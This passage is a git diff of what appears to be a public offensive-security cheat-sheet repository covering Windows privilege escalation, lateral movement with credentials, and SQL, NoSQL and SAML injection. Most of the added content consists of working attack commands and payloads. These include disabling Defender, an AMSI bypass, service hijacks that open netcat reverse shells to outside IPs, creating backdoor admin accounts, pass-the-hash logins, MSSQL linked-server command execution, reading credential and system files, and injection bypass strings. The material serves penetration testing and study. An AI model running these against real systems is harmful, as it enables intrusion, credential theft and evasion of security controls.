Writeable Folders](#default-writeable-folders) * [EoP - Looting for passwords](#eop---looting-for-passwords) * [SAM and SYSTEM files](#sam-and-system-files) * [Search for file contents](#search-for-file-contents) * [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename) * [Search the registry for key names and passwords](#search-the-registry-for-key-names-and-passwords) - * [Passwords in unattend.xml](#passwords-in-unattend.xml) + * [Passwords in unattend.xml](#passwords-in-unattendxml) * [Wifi passwords](#wifi-passwords) * [Passwords stored in services](#passwords-stored-in-services) * [Powershell history](#powershell-history) @@ -24,10 +28,13 @@ * [EoP - Kernel Exploitation](#eop---kernel-exploitation) * [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated) * [EoP - Insecure GUI apps](#eop---insecure-gui-apps) +* [EoP - Evaluating Vulnerable Drivers](#eop---evaluating-vulnerable-drivers) * [EoP - Runas](#eop---runas) +* [EoP - Abusing Shadow Copies](#eop---abusing-shadow-copies) * [EoP - From local administrator to NT SYSTEM](#eop---from-local-administrator-to-nt-system) * [EoP - Living Off The Land Binaries and Scripts](#eop---living-off-the-land-binaries-and-scripts) * [EoP - Impersonation Privileges](#eop---impersonation-privileges) + * [Restore A Service Account's Privileges](#restore-a-service-accounts-privileges) * [Meterpreter getsystem and alternatives](#meterpreter-getsystem-and-alternatives) * [RottenPotato (Token Impersonation)](#rottenpotato-token-impersonation) * [Juicy Potato (abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges) @@ -62,6 +69,11 @@ - [WindowsExploits - Windows exploits, mostly precompiled. Not being updated.](https://github.com/abatchy17/WindowsExploits) - [WindowsEnum - A Powershell Privilege Escalation Enumeration Script.](https://github.com/absolomb/WindowsEnum) - [Seatbelt - A C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.](https://github.com/GhostPack/Seatbelt) + ```powershell + Seatbelt.exe -group=all -full + Seatbelt.exe -group=system -outputfile="C:\Temp\system.txt" + Seatbelt.exe -group=remote -computername=dc.theshire.local -computername=192.168.230.209 -username=THESHIRE\sam -password="yum \"po-ta-toes\"" + ``` - [Powerless - Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind](https://github.com/M4ximuss/Powerless) - [JAWS - Just Another Windows (Enum) Script](https://github.com/411Hall/JAWS) ```powershell @@ -221,11 +233,55 @@ reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse ``` -## AppLocker Enumeration +## Antivirus & Detections + +### Windows Defender + +```powershell +# check status of Defender +PS C:\> Get-MpComputerStatus + +# disable Real Time Monitoring +PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus +``` + +### AppLocker Enumeration - With the GPO - HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (Keys: Appx, Dll, Exe, Msi and Script). +List AppLocker rules + +```powershell +PS C:\> $a = Get-ApplockerPolicy -effective +PS C:\> $a.rulecollections +``` + +### Powershell + +Default powershell locations in a Windows system. + +```powershell +C:\windows\syswow64\windowspowershell\v1.0\powershell +C:\Windows\System32\WindowsPowerShell\v1.0\powershell +``` + +Example of AMSI Bypass. + +```powershell +PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true) +``` + + +### Default Writeable Folders + +```powershell +C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys +C:\Windows\System32\spool\drivers\color +C:\Windows\Tasks +C:\windows\tracing +``` + ## EoP - Looting for passwords ### SAM and SYSTEM files @@ -416,6 +472,7 @@ tasklist /v net start sc query Get-Service +Get-Process Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize ``` @@ -519,9 +576,9 @@ Prerequisite: Service account ```powershell PS C:\Windows\system32> sc.exe stop UsoSvc -PS C:\Windows\system32> sc.exe config UsoSvc binPath="cmd /c type C:\Users\Administrator\Desktop\root.txt > C:\a.txt" PS C:\Windows\system32> sc.exe config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe 10.10.10.10 4444 -e cmd.exe" PS C:\Windows\system32> sc.exe config UsoSvc binpath= "C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe" +PS C:\Windows\system32> sc.exe config UsoSvc binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe" PS C:\Windows\system32> sc.exe qc usosvc [SC] QueryServiceConfig SUCCESS @@ -687,6 +744,26 @@ Application running as SYSTEM allowing an user to spawn a CMD, or browse directo Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click to open Command Prompt" +## EoP - Evaluating Vulnerable Drivers +Look for vuln drivers loaded, we often don't spend enough time looking at this: + +```powershell +PS C:\Users\Swissky> driverquery.exe /fo table + +Module Name Display Name Driver Type Link Date +============ ====================== ============= ====================== +1394ohci 1394 OHCI Compliant Ho Kernel 12/10/2006 4:44:38 PM +3ware 3ware Kernel 5/18/2015 6:28:03 PM +ACPI Microsoft ACPI Driver Kernel 12/9/1975 6:17:08 AM +AcpiDev ACPI Devices driver Kernel 12/7/1993 6:22:19 AM +acpiex Microsoft ACPIEx Drive Kernel 3/1/2087 8:53:50 AM +acpipagr ACPI Processor Aggrega Kernel 1/24/2081 8:36:36 AM +AcpiPmi ACPI Power Meter Drive Kernel 11/19/2006 9:20:15 PM +acpitime ACPI Wake Alarm Driver Kernel 2/9/1974 7:10:30 AM +ADP80XX ADP80XX Kernel 4/9/2015 4:49:48 PM + +``` + ## EoP - Runas Use the `cmdkey` to list the stored credentials on the machine. @@ -712,12 +789,27 @@ C:\Windows\System32\runas.exe /env /noprofile /user: "c:\us ``` ```powershell -$ secpasswd = ConvertTo-SecureString "" -AsPlainText -Force -$ mycreds = New-Object System.Management.Automation.PSCredential ("", $secpasswd) -$ computer = "" +$secpasswd = ConvertTo-SecureString "" -AsPlainText -Force +$mycreds = New-Object System.Management.Automation.PSCredential ("", $secpasswd) +$computer = "" [System.Diagnostics.Process]::Start("C:\users\public\nc.exe"," 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer) ``` +## EoP - Abusing Shadow Copies + +If you have local administrator access on a machine try to list shadow copies, it's an easy way for Privilege Escalation. + +```powershell +# List shadow copies using vssadmin (Needs Admnistrator Access) +vssadmin list shadows + +# List shadow copies using diskshadow +diskshadow list shadows all + +# Make a symlink to the shadow copy and access it +mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\ +``` + ## EoP - From local administrator to NT SYSTEM ```powershell @@ -758,6 +850,37 @@ Full privileges cheatsheet at https://github.com/gtworek/Priv2Admin, summary bel |`SeTakeOwnership`| ***Admin*** | ***Built-in commands*** |1. `takeown.exe /f "%windir%\system32"`
2. `icalcs.exe "%windir%\system32" /grant "%username%":F`
3. Rename cmd.exe to utilman.exe
4. Lock the console and press Win+U| Attack may be detected by some AV software.

Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. | |`SeTcb`| ***Admin*** | 3rd party tool | Manipulate tokens to have local admin rights included. May require SeImpersonate.

To be verified. || +### Restore A Service Account's Privileges + +> This tool should be executed as LOCAL SERVICE or NETWORK SERVICE only. + +```powershell +# https://github.com/itm4n/FullPowers + +c:\TOOLS>FullPowers +[+] Started dummy thread with id 9976 +[+] Successfully created scheduled task. +[+] Got new token! Privilege count: 7 +[+] CreateProcessAsUser() OK +Microsoft Windows [Version 10.0.19041.84] +(c) 2019 Microsoft Corporation. All rights reserved. + +C:\WINDOWS\system32>whoami /priv +PRIVILEGES INFORMATION +---------------------- +Privilege Name Description State +============================= ========================================= ======= +SeAssignPrimaryTokenPrivilege Replace a process level token Enabled +SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled +SeAuditPrivilege Generate security audits Enabled +SeChangeNotifyPrivilege Bypass traverse checking Enabled +SeImpersonatePrivilege Impersonate a client after authentication Enabled +SeCreateGlobalPrivilege Create global objects Enabled +SeIncreaseWorkingSetPrivilege Increase a process working set Enabled + +c:\TOOLS>FullPowers -c "C:\TOOLS\nc64.exe 1.2.3.4 1337 -e cmd" -z +``` + ### Meterpreter getsystem and alternatives @@ -794,7 +917,7 @@ Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -n ### Juicy Potato (abusing the golden privileges) Binary available at : https://github.com/ohpe/juicy-potato/releases -:warning: Juicy Potato doesn't work on Windows Server 2019 and Windows 10 1809. +:warning: Juicy Potato doesn't work on Windows Server 2019 and Windows 10 1809 +. 1. Check the privileges of the service account, you should look for **SeImpersonate** and/or **SeAssignPrimaryToken** (Impersonate a client after authentication) @@ -979,4 +1102,4 @@ Detailed information about the vulnerability : https://www.zerodayinitiative.com * [Alternative methods of becoming SYSTEM - 20th November 2017 - Adam Chester @_xpn_](https://blog.xpnsec.com/becoming-system/) * [Living Off The Land Binaries and Scripts (and now also Libraries)](https://github.com/LOLBAS-Project/LOLBAS) * [Common Windows Misconfiguration: Services - 2018-09-23 - @am0nsec](https://amonsec.net/2018/09/23/Common-Windows-Misconfiguration-Services.html) -* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf) \ No newline at end of file +* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf) diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index cd27039..c674732 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -9,10 +9,12 @@ * [Metasploit](#metasploit) * [Metasploit - SMB](#metasploit-smb) * [Metasploit - Psexec](#metasploit-psexec) +* [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials) +* [WinRM](#winrm) * [Crackmapexec](#crackmapexec) * [Winexe](#winexe) * [WMI](#wmi) -* [Psexec.py / Smbexec.py / Wmiexec.py](#psexec.py---smbexec.py---wmiexec.py) +* [Psexec.py / Smbexec.py / Wmiexec.py](#psexecpy--smbexecpy--wmiexecpy) * [PsExec - Sysinternal](#psexec-sysinternal) * [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol) * [Netuse](#netuse) @@ -23,7 +25,7 @@ ### TIP 1 - Create your credential ```powershell -net user hacker hacker1234* /add +net user hacker Hcker_12345678* /add /Y net localgroup administrators hacker /add net localgroup "Remote Desktop Users" hacker /add # RDP access net localgroup "Backup Operators" hacker /add # Full access to files @@ -91,40 +93,96 @@ shell ## Crackmapexec -```python -git clone https://github.com/byt3bl33d3r/CrackMapExec.github -python crackmapexec.py 10.9.122.0/25 -d DOMAIN -u username -p password -python crackmapexec.py 10.10.10.10 -d DOMAIN -u username -p password -x whoami -# pass the hash -cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth +```powershell +root@payload$ git clone https://github.com/byt3bl33d3r/CrackMapExec.github +root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -x 'whoami' # cmd +root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -X 'whoami' # powershell +root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method atexec -x 'whoami' +root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method wmiexec -x 'whoami' +root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -x 'whoami' +``` + +## Remote Code Execution with PS Credentials + +```powershell +PS C:\> $SecPassword = ConvertTo-SecureString 'secretpassword' -AsPlainText -Force +PS C:\> $Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\USERNAME', $SecPassword) +PS C:\> Invoke-Command -ComputerName DC01 -Credential $Cred -ScriptBlock {whoami} +``` + +## WinRM + +Require: +* Port **5985** or **5986** open. +* Default endpoint is **/wsman** + +```powershell +root@payload$ git clone https://github.com/Hackplayers/evil-winrm +root@payload$ evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] +root@payload$ evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/' +``` + +or using a custom ruby code to interact with the WinRM service. + +```ruby +require 'winrm' + +conn = WinRM::Connection.new( + endpoint: 'http://ip:5985/wsman', + user: 'domain/user', + password: 'password', +) + +command="" +conn.shell(:powershell) do |shell| + until command == "exit\n" do + print "PS > " + command = gets + output = shell.run(command) do |stdout, stderr| + STDOUT.print stdout + STDERR.print stderr + end + end + puts "Exiting with code #{output.exitcode}" +end ``` ## Winexe Integrated to Kali -```python -winexe -U DOMAIN/username%password //10.10.10.10 cmd.exe +```powershell +root@payload$ winexe -U DOMAIN/username%password //10.10.10.10 cmd.exe ``` ## WMI ```powershell -wmic /node:target.domain /user:domain\user /password:password process call create "C:\Windows\System32\calc.exe” +PS C:\> wmic /node:target.domain /user:domain\user /password:password process call create "C:\Windows\System32\calc.exe” ``` ## Psexec.py / Smbexec.py / Wmiexec.py from Impacket -```python -git clone https://github.com/CoreSecurity/impacket.git -python psexec.py DOMAIN/username:password@10.10.10.10 -python smbexec.py DOMAIN/username:password@10.10.10.10 -python wmiexec.py DOMAIN/username:password@10.10.10.10 +```powershell +root@payload$ git clone https://github.com/CoreSecurity/impacket.git -# psexec.exe -s cmd -# switch admin user to NT Authority/System +# PSEXEC like functionality example using RemComSv +root@payload$ python psexec.py DOMAIN/username:password@10.10.10.10 +# this will drop a binary on the disk = noisy + +# A similar approach to PSEXEC w/o using RemComSvc +root@payload$ python smbexec.py DOMAIN/username:password@10.10.10.10 + +# A semi-interactive shell, used through Windows Management Instrumentation. +root@payload$ python wmiexec.py DOMAIN/username:password@10.10.10.10 + +# A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints. +root@payload$ python atexec.py DOMAIN/username:password@10.10.10.10 + +# Executes a command on the target machine through the Task Scheduler service and returns the output of the executed command. +root@payload$ python dcomexec.py DOMAIN/username:password@10.10.10.10 ``` ## PsExec - Sysinternal @@ -132,8 +190,10 @@ python wmiexec.py DOMAIN/username:password@10.10.10.10 from Windows - [Sysinternal](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) ```powershell -PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s # get System shell +PS C:\> PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe + +# switch admin user to NT Authority/System +PS C:\> PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s ``` ## RDP Remote Desktop Protocol @@ -141,14 +201,14 @@ PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s # get Abuse RDP protocol to execute commands remotely with [SharpRDP](https://github.com/0xthirteen/SharpRDP) ```powershell -SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password +PS C:\> SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password ``` Or connect remotely with `rdesktop` ```powershell -rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/myshare -rdesktop -u username -p password -g 70 -r disk:share=/tmp/myshare 10.10.10.10 +root@payload$ rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/myshare +root@payload$ rdesktop -u username -p password -g 70 -r disk:share=/tmp/myshare 10.10.10.10 # -g : the screen will take up 70% of your actual screen size # -r disk:share : sharing a local folder during a remote desktop session ``` @@ -156,35 +216,35 @@ rdesktop -u username -p password -g 70 -r disk:share=/tmp/myshare 10.10.10.10 Note: you may need to enable it with the following command ```powershell -reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f -netsh firewall set service remoteadmin enable -netsh firewall set service remotedesktop enable +PS C:\> reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f +PS C:\> netsh firewall set service remoteadmin enable +PS C:\> netsh firewall set service remotedesktop enable ``` or with psexec(sysinternals) ```powershell -psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 +PS C:\> psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 ``` or with crackmapexec ```powershell -crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable +root@payload$ crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable ``` or with Metasploit ```powershell -run getgui -u admin -p 1234 +root@payload$ run getgui -u admin -p 1234 ``` or with xfreerdp ```powershell -xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+ -xfreerdp -u test -p 36374BD2767773A2DD4F6B010EC5EE0D 192.168.226.129 # pass the hash using Restricted Admin, need an admin account not in the "Remote Desktop Users" group. -xfreerd /u:runner /v:10.0.0.1 # password will be asked +root@payload$ xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+ +root@payload$ xfreerdp -u test -p 36374BD2767773A2DD4F6B010EC5EE0D 192.168.226.129 # pass the hash using Restricted Admin, need an admin account not in the "Remote Desktop Users" group. +root@payload$ xfreerd /u:runner /v:10.0.0.1 # password will be asked ``` ## Netuse @@ -192,19 +252,18 @@ xfreerd /u:runner /v:10.0.0.1 # password will be asked Windows only ```powershell -net use \\ordws01.cscou.lab /user:DOMAIN\username password -C$ +PS C:\> net use \\ordws01.cscou.lab /user:DOMAIN\username password C$ ``` ## Runas ```powershell -runas /netonly /user:DOMAIN\username "cmd.exe" -runas /noprofil /netonly /user:DOMAIN\username cmd.exe +PS C:\> runas /netonly /user:DOMAIN\username "cmd.exe" +PS C:\> runas /noprofil /netonly /user:DOMAIN\username cmd.exe ``` ## References - [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/) - [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/) -- [Gaining Domain Admin from Outside Active Directory](https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html) +- [Gaining Domain Admin from Outside Active Directory](https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html) \ No newline at end of file diff --git a/NoSQL Injection/README.md b/NoSQL Injection/README.md index 7c203b8..cebfe1b 100644 --- a/NoSQL Injection/README.md +++ b/NoSQL Injection/README.md @@ -27,8 +27,11 @@ Basic authentication bypass using not equal ($ne) or greater ($gt) ```json -in URL +in DATA username[$ne]=toto&password[$ne]=toto +login[$regex]=a.*&pass[$ne]=lol +login[$gt]=admin&login[$lt]=test&pass[$ne]=1 +login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto in JSON {"username": {"$ne": null}, "password": {"$ne": null}} diff --git a/README.md b/README.md index f6586c4..478a9a5 100644 --- a/README.md +++ b/README.md @@ -17,6 +17,9 @@ You might also like the `Methodology and Resources` folder : - [Methodology and Resources](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/) - [Active Directory Attack.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md) + - [Cloud - AWS Pentest.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md) + - [Cloud - Azure Pentest.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md) + - [Cobalt Strike - Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cobalt%20Strike%20-%20Cheatsheet.md) - [Linux - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Persistence.md) - [Linux - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md) - [Metasploit - Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Metasploit%20-%20Cheatsheet.md) @@ -31,23 +34,7 @@ You might also like the `Methodology and Resources` folder : - [Windows - Post Exploitation Koadic.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Post%20Exploitation%20Koadic.md) - [Windows - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md) - [Windows - Using credentials.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Using%20credentials.md) - - [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits) - - Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py - - Apache Struts 2 CVE-2017-9805.py - - Apache Struts 2 CVE-2018-11776.py - - Docker API RCE.py - - Drupalgeddon2 CVE-2018-7600.rb - - Heartbleed CVE-2014-0160.py - - JBoss CVE-2015-7501.py - - Jenkins CVE-2015-8103.py - - Jenkins CVE-2016-0792.py - - Rails CVE-2019-5420.rb - - Shellshock CVE-2014-6271.py - - Tomcat CVE-2017-12617.py - - WebLogic CVE-2016-3510.py - - WebLogic CVE-2017-10271.py - - WebLogic CVE-2018-2894.py - - WebSphere CVE-2015-7450.py + You want more ? Check the [Books](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/BOOKS.md) and [Youtube videos](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/YOUTUBE.md) selections. diff --git a/SAML Injection/README.md b/SAML Injection/README.md index e244bfd..2ba8dae 100644 --- a/SAML Injection/README.md +++ b/SAML Injection/README.md @@ -70,7 +70,7 @@ XML Signature Wrapping (XSW) attack, some implementations check for a valid sign - XSW1 – Applies to SAML Response messages. Add a cloned unsigned copy of the Response after the existing signature. - XSW2 – Applies to SAML Response messages. Add a cloned unsigned copy of the Response before the existing signature. - XSW3 – Applies to SAML Assertion messages. Add a cloned unsigned copy of the Assertion before the existing Assertion. -- XSW4 – Applies to SAML Assertion messages. Add a cloned unsigned copy of the Assertion after the existing Assertion. +- XSW4 – Applies to SAML Assertion messages. Add a cloned unsigned copy of the Assertion within the existing Assertion. - XSW5 – Applies to SAML Assertion messages. Change a value in the signed copy of the Assertion and adds a copy of the original Assertion with the signature removed at the end of the SAML message. - XSW6 – Applies to SAML Assertion messages. Change a value in the signed copy of the Assertion and adds a copy of the original Assertion with the signature removed after the original signature. - XSW7 – Applies to SAML Assertion messages. Add an “Extensions” block with a cloned unsigned assertion. diff --git a/SQL Injection/Intruder/Generic_Fuzz.txt b/SQL Injection/Intruder/Generic_Fuzz.txt new file mode 100644 index 0000000..624fb4d --- /dev/null +++ b/SQL Injection/Intruder/Generic_Fuzz.txt @@ -0,0 +1,12 @@ +1 +1' +1" +[1] +1` +1\ +1/*'*/ +1/*!1111'*/ +1'||'asd'||' +1' or '1'='1 +1 or 1=1 +'or''=' \ No newline at end of file diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index 0e79365..35836c8 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md @@ -17,6 +17,7 @@ * [MSSQL Command execution](#mssql-command-execution) * [MSSQL UNC path](#mssql-unc-path) * [MSSQL Make user DBA](#mssql-make-user-dba-db-admin) +* [MSSQL Trusted Links](#mssql-trusted-links) ## MSSQL comments @@ -25,6 +26,12 @@ /* comment goes here */ ``` +## MSSQL User + +```sql +SELECT CURRENT_USER +``` + ## MSSQL version ```sql @@ -162,6 +169,25 @@ sqsh -S 192.168.1.X -U sa -P superPassword python mssqlclient.py WORKGROUP/Administrator:password@192.168.1X -port 46758 ``` +Execute Python script + +> Executed by a different user than the one using xp_cmdshell to execute commands + +```powershell +#Print the user being used (and execute commands) +EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())' +EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))' +#Open and read a file +EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())' +#Multiline +EXECUTE sp_execute_external_script @language = N'Python', @script = N' +import sys +print(sys.version) +' +GO +``` + + ## MSSQL UNC Path MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash. @@ -176,8 +202,42 @@ MSSQL supports stacked queries so we can create a variable pointing to our IP ad EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin; ``` +## MSSQL Trusted Links + +> The links between databases work even across forest trusts. + +```powershell +msf> use exploit/windows/mssql/mssql_linkcrawler +[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter sessio +``` + +Manual exploitation + +```sql +-- find link +select * from master..sysservers + +-- execute query through the link +select * from openquery("dcorp-sql1", 'select * from master..sysservers') +select version from openquery("linkedserver", 'select @@version as version'); + +-- chain multiple openquery +select version from openquery("link1",'select version from openquery("link2","select @@version as version")') + +-- execute shell commands +EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer +select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"') + +-- create user and give admin privileges +EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" +EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" +``` + ## References * [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet) * [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/) * [Error Based - SQL Injection ](https://github.com/incredibleindishell/exploit-code-by-me/blob/master/MSSQL%20Error-Based%20SQL%20Injection%20Order%20by%20clause/Error%20based%20SQL%20Injection%20in%20“Order%20By”%20clause%20(MSSQL).pdf) +* [MSSQL Trusted Links - HackTricks.xyz](https://book.hacktricks.xyz/windows/active-directory-methodology/mssql-trusted-links) +* [SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6th, 2013](https://blog.netspi.com/how-to-hack-database-links-in-sql-server/) +* [DAFT: Database Audit Framework & Toolkit - NetSPI](https://github.com/NetSPI/DAFT) \ No newline at end of file diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index 00bbbf4..e25c1c5 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -14,6 +14,7 @@ * [PostgreSQL List tables](#postgresql-list-tables) * [PostgreSQL List columns](#postgresql-list-columns) * [PostgreSQL Error Based](#postgresql-error-based) +* [PostgreSQL XML Helpers](#postgresql-xml-helpers) * [PostgreSQL Blind](#postgresql-blind) * [PostgreSQL Time Based](#postgresql-time-based) * [PostgreSQL Stacked query](#postgresql-stacked-query) @@ -106,6 +107,21 @@ SELECT column_name FROM information_schema.columns WHERE table_name='data_table' ' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1 ``` +## PostgreSQL XML helpers + +```sql +select query_to_xml('select * from pg_user',true,true,''); -- returns all the results as a single xml row +``` + +The `query_to_xml` above returns all the results of the specified query as a single result. Chain this with the [PostgreSQL Error Based](#postgresql-error-based) technique to exfiltrate data without having to worry about `LIMIT`ing your query to one result. + +```sql +select database_to_xml(true,true,''); -- dump the current database to XML +select database_to_xmlschema(true,true,''); -- dump the current db to an XML schema +``` + +Note, with the above queries, the output needs to be assembled in memory. For larger databases, this might cause a slow down or denial of service condition. + ## PostgreSQL Blind ```sql @@ -135,7 +151,7 @@ select pg_ls_dir('./'); select pg_read_file('PG_VERSION', 0, 200); ``` -NOTE: ``pg_read_file` doesn't accept the `/` character. +NOTE: Earlier versions of Postgres did not accept absolute paths in `pg_read_file` or `pg_ls_dir`. Newer versions (as of [this](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a) commit) will allow reading any file/filepath for super users or users in the `default_role_read_server_files` group. ```sql CREATE TABLE temp(t TEXT); @@ -143,6 +159,12 @@ COPY temp FROM '/etc/passwd'; SELECT * FROM temp limit 1 offset 0; ``` +```sql +SELECT lo_import('/etc/passwd'); -- will create a large object from the file and return the OID 